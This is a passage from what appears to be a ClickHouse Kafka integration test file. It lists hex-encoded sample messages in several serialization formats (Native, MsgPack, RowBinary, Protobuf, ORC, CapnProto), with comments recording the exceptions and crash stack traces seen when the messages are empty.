'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.cpp:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack' : {
'data_sample' : [
'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary' : {
'data_sample' : [
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes' : {
'data_sample' : [
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
#''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf' : {
'data_sample' : [
'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC' : {
'data_sample' : [
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
#''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto' : {
'data_sample' : [
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x